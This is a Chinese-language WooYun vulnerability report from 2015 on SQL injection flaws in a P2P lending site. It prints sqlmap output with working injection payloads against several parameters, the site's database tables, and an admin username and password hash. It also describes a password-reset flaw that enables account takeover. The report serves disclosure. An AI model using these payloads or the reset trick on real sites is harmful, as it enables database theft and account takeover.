当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142321

漏洞标题:p2p网贷平台邦尼网存在sql注入漏洞可入后台

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-24 00:16

修复时间:2015-09-29 00:18

公开时间:2015-09-29 00:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

P2B网贷平台邦尼网多处sql注入漏洞可入后台,前几天测试的,因网络问题没有提交

详细说明:

注入点1:

http://**.**.**.**/index.php?c=article&a=type&tid=48


测试

http://**.**.**.**/index.php?c=article&a=type&tid=48'


返回

SELECT pid FROM ld_classtype WHERE tid = '48'' ORDER BY tid LIMIT 1
执行错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near ''48'' ORDER BY tid LIMIT 1' at line 1


1.jpg


上sqlmap测试

[00:51:25] [INFO] GET parameter 'tid' seems to be 'AND boolean-based blind - WHE
RE or HAVING clause' injectable
[00:51:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:51:26] [INFO] GET parameter 'tid' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[00:51:26] [INFO] testing 'MySQL inline queries'
[00:51:26] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:51:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:51:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:51:56] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[00:51:58] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[00:52:01] [INFO] target URL appears to have 1 column in query
[00:52:31] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:52:31] [WARNING] most probably web server instance hasn't recovered yet from
 previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. '--flush-session --tec
hnique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec
=2')
[00:53:03] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:53:34] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:54:05] [CRITICAL] connection timed out to the target URL or proxy
[00:54:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:55:06] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:55:37] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:56:08] [CRITICAL] connection timed out to the target URL or proxy
[00:56:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:56:38] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:57:09] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:57:40] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:58:11] [CRITICAL] connection timed out to the target URL or proxy
[00:58:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:59:12] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[00:59:43] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[01:00:14] [CRITICAL] connection timed out to the target URL or proxy
GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 361 HTTP(s) req
uests:
---
Place: GET
Parameter: tid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: c=article&a=type&tid=48' AND 7380=7380 AND 'RCOt'='RCOt
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: c=article&a=type&tid=48' AND (SELECT 6287 FROM(SELECT COUNT(*),CONC
AT(0x71686f7a71,(SELECT (CASE WHEN (6287=6287) THEN 1 ELSE 0 END)),0x71676e7371,
FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Sva
k'='Svak
---
[01:01:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
[01:01:49] [INFO] testing MySQL
[01:01:50] [WARNING] reflective value(s) found and filtering out
[01:01:50] [INFO] confirming MySQL
[01:01:51] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[01:01:51] [INFO] fetching current user
[01:01:52] [INFO] retrieved: 2bu@%
current user:    '2bu@%'
[01:01:52] [INFO] fetching current database
[01:01:53] [INFO] retrieved: 2bu
current database:    '2bu'
[01:01:53] [INFO] testing if current user is DBA
[01:01:53] [INFO] fetching current user
current user is DBA:    False
[01:02:05] [INFO] testing MySQL
[01:02:05] [INFO] confirming MySQL
[01:02:05] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[01:02:05] [INFO] fetching database users
[01:02:06] [WARNING] reflective value(s) found and filtering out
[01:02:06] [INFO] the SQL query used returns 1 entries
[01:02:07] [INFO] retrieved: '2bu'@'%'
database management system users [1]:
[*] '2bu'@'%'
[01:02:32] [INFO] testing MySQL
[01:02:32] [INFO] confirming MySQL
[01:02:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[01:02:32] [INFO] fetching database names
[01:02:33] [WARNING] reflective value(s) found and filtering out
[01:02:33] [INFO] the SQL query used returns 2 entries
[01:02:33] [INFO] starting 2 threads
[01:02:34] [INFO] retrieved: 2bu
[01:02:34] [INFO] retrieved: information_schema
available databases [2]:
[*] 2bu
[*] information_schema
Database: 2bu
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| ld_city             | 3408    |
| ld_classtype        | 319     |
| ld_article          | 187     |
| ld_article_field    | 177     |
| ld_comment          | 113     |
| ld_member           | 71      |
| ld_onlinesq         | 63      |
| ld_links            | 48      |
| ld_admin_per        | 44      |
| ld_fields           | 27      |
| ld_ads              | 23      |
| ld_message          | 23      |
| ld_message_field    | 23      |
| ld_sysconfig        | 23      |
| ld_listen           | 13      |
| ld_consumer_records | 9       |
| ld_adstype          | 8       |
| ld_apply            | 6       |
| ld_funs             | 5       |
| ld_linkstype        | 4       |
| ld_setting_sns      | 4       |
| ld_traits           | 4       |
| ld_molds            | 3       |
| ld_payment          | 3       |
| ld_labelcus         | 2       |
| ld_login_talk       | 2       |
| ld_logistics        | 2       |
| ld_payment_record   | 2       |
| ld_admin_group      | 1       |
| ld_admin_user       | 1       |
| ld_collection_node  | 1       |
| ld_custom           | 1       |
| ld_heed             | 1       |
| ld_member_field     | 1       |
| ld_member_group     | 1       |
| ld_qqlogin          | 1       |
| ld_share            | 1       |
| ld_weibologin       | 1       |
+---------------------+---------+
Database: 2bu
Table: ld_admin_user
[1 entry]
+-----+------+------+----------------------------------+-------+-------+-------+
---------+------------+
| gid | auid | atel | apass                            | amail | auser | aname |
 level   | pclasstype |
+-----+------+------+----------------------------------+-------+-------+-------+
---------+------------+
| 1   | 1    | ??   | cb5e53a884c61397a153276cf7810a24 | ??    | admin | ????  |
 1       | <blank>    |
+-----+------+------+----------------------------------+-------+-------+-------+
---------+------------+


后台地址

http://**.**.**.**/admin.php


可通过获取的管理员帐号登楼后台,因MD5解密不了,因此并未进入后台。
注入点2:

http://**.**.**.**/index.php?c=message&a=type&tid=41


tid存在注入已经测试
问题在于“问题咨询”处的“搜索答案”
测试搜索1'
返回

select * from ld_message where isshow=1 and (title like '%1'%' or body like '%1'%') 
执行错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '%' or body like '%1'%')' at line 1


抓包

http://**.**.**.**/index.php?c=apply&a=zixun (POST)
word=1


word存在注入

2.jpg


sqlmap直接测试

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: word
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: word=1%') AND 4702=4702 AND ('%'='
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: word=1%') AND (SELECT 5059 FROM(SELECT COUNT(*),CONCAT(0x71756f6571
,(SELECT (CASE WHEN (5059=5059) THEN 1 ELSE 0 END)),0x716f786c71,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('%'='
    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: word=1%') UNION ALL SELECT NULL,CONCAT(0x71756f6571,0x46685a614c547
0734f65,0x716f786c71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: word=1%') AND SLEEP(5) AND ('%'='
---
[01:37:17] [INFO] testing MySQL
[01:37:20] [WARNING] automatically patching output having last char trimmed
[01:37:20] [INFO] confirming MySQL
[01:37:27] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[01:37:27] [INFO] fetching current user
current user:    '2bu@%'
[01:37:31] [INFO] fetching current database
current database:    '2bu'
[01:37:34] [INFO] testing if current user is DBA
[01:37:34] [INFO] fetching current user
[01:37:36] [WARNING] reflective value(s) found and filtering out
[01:37:36] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False


注入点3:

http://**.**.**.**/index.php?c=apply&a=qingchu&jd=&lx=&zb=&nf=&fl=


测试

http://**.**.**.**/index.php?c=apply&a=qingchu&jd='&lx='&zb='&nf='&fl='


很有意思的是,jd参数加了'返回错误,然后增加lx参数加'反而没有错误看到了,具体如何实现分析错误代码就知道了!~~~

select * from ld_article where pdqiye=1 and qyleixing=''' and qyzijin=''' and qynianfen=''' and qyjieduan=''' and qyfenlei=''' 
order by id desc limit 0,10
执行错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '''' order by id desc limit 0,10' at line 1


五个参数均存在注入,分别是jd、lx、zb、nf、fl

3.jpg


sqlmap测试之结果

sqlmap identified the following injection points with a total of 327 HTTP(s) req
uests:
---
Place: GET
Parameter: jd
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: c=apply&a=qingchu&jd=' AND (SELECT 3247 FROM(SELECT COUNT(*),CONCAT
(0x716d6e6f71,(SELECT (CASE WHEN (3247=3247) THEN 1 ELSE 0 END)),0x7162666d71,FL
OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ByiX'
='ByiX&lx=&zb=&nf=&fl=
Place: GET
Parameter: zb
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: c=apply&a=qingchu&jd=&lx=&zb=' AND (SELECT 3569 FROM(SELECT COUNT(*
),CONCAT(0x716d6e6f71,(SELECT (CASE WHEN (3569=3569) THEN 1 ELSE 0 END)),0x71626
66d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AN
D 'yRdV'='yRdV&nf=&fl=
Place: GET
Parameter: fl
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: c=apply&a=qingchu&jd=&lx=&zb=&nf=&fl=' AND (SELECT 9160 FROM(SELECT
 COUNT(*),CONCAT(0x716d6e6f71,(SELECT (CASE WHEN (9160=9160) THEN 1 ELSE 0 END))
,0x7162666d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
 x)a) AND 'QpTy'='QpTy
Place: GET
Parameter: lx
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: c=apply&a=qingchu&jd=&lx=' AND (SELECT 7715 FROM(SELECT COUNT(*),CO
NCAT(0x716d6e6f71,(SELECT (CASE WHEN (7715=7715) THEN 1 ELSE 0 END)),0x7162666d7
1,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'e
FUe'='eFUe&zb=&nf=&fl=
Place: GET
Parameter: nf
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: c=apply&a=qingchu&jd=&lx=&zb=&nf=' AND (SELECT 6328 FROM(SELECT COU
NT(*),CONCAT(0x716d6e6f71,(SELECT (CASE WHEN (6328=6328) THEN 1 ELSE 0 END)),0x7
162666d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a
) AND 'BQZl'='BQZl&fl=
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: jd, type: Single quoted string (default)
[1] place: GET, parameter: lx, type: Single quoted string
[2] place: GET, parameter: zb, type: Single quoted string
[3] place: GET, parameter: nf, type: Single quoted string
[4] place: GET, parameter: fl, type: Single quoted string
[q] Quit
> 0
[01:54:34] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
[01:54:34] [INFO] fetching current user
[01:54:35] [INFO] retrieved: 2bu@%
current user:    '2bu@%'
[01:54:35] [INFO] fetching current database
[01:54:36] [INFO] retrieved: 2bu
current database:    '2bu'
[01:54:36] [INFO] testing if current user is DBA
[01:54:36] [INFO] fetching current user
current user is DBA:    False


注入点4:

http://**.**.**.**/index.php?c=apply&a=zhaomima1


账户名处输入:admin'
返回错误信息

select * from ld_member where user='admin''
执行错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near ''admin''' at line 1


抓包,获取POST数据

http://**.**.**.**/index.php?c=apply&a=zhaomima2 (POST)
username=admin


username参数存在注入

4.jpg


用sqlmap测试

POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 57 HTTP(s) requ
ests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=admin' AND (SELECT 5188 FROM(SELECT COUNT(*),CONCAT(0x7179
666c71,(SELECT (CASE WHEN (5188=5188) THEN 1 ELSE 0 END)),0x716a716f71,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IOwP'='IOwP
    Type: UNION query
    Title: MySQL UNION query (NULL) - 42 columns
    Payload: username=admin' UNION ALL SELECT CONCAT(0x7179666c71,0x614f4649524b
46794847,0x716a716f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[02:11:06] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.17
back-end DBMS: MySQL 5.0
[02:11:06] [INFO] fetching current user
current user:    '2bu@%'
[02:11:07] [INFO] fetching current database
current database:    '2bu'
[02:11:09] [INFO] testing if current user is DBA
[02:11:09] [INFO] fetching current user
[02:11:10] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False


5、验证不严导致可以获取用户信息:

http://**.**.**.**/index.php?c=apply&a=zhaomima1


这里,我们可以抓包,然后用大量用户进行测试,获取存在的用户,比如:boxerking(从上面获取的用户信息测试,就不用burpsuite跑用户表了)
输入正确的用户名后

http://**.**.**.**/index.php?c=apply&a=zhaomima2


我们随便输入一些数字,提示邮箱不正确,此时看看抓包可以发现返回的数据信息为

http://**.**.**.**/index.php?c=apply&a=zhaomima3 (POST)
user_name=boxerking&user_email=188777830@**.**.**.**&email=111


那么我们利用抓取到的邮箱,就可以更改用户密码了!~~~

漏洞证明:

修复方案:

过滤修复!~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-29 00:18

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无